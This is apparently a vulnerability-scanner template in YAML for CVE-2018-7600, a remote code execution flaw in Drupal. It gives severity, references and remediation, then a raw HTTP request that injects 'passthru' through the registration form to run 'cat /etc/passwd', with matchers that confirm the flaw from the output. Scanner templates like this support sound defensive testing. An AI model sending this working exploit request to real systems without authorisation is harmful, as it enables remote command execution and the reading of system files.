75 lines
2.5 KiB
YAML
75 lines
2.5 KiB
YAML
id: CVE-2018-7600
|
|
|
|
info:
|
|
name: Drupal - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
|
|
remediation: |
|
|
Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team.
|
|
reference:
|
|
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
|
|
- https://www.drupal.org/sa-core-2018-002
|
|
- https://groups.drupal.org/security/faq-2018-002
|
|
- http://www.securitytracker.com/id/1040598
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-7600
|
|
cwe-id: CWE-20
|
|
epss-score: 0.9756
|
|
epss-percentile: 0.99997
|
|
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: drupal
|
|
product: drupal
|
|
shodan-query: http.component:"drupal"
|
|
tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: application/json
|
|
Referer: {{Hostname}}/user/register
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
|
|
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#post_render][]"
|
|
|
|
passthru
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#type]"
|
|
|
|
markup
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#markup]"
|
|
|
|
cat /etc/passwd
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="form_id"
|
|
|
|
user_register_form
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="_drupal_ajax"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|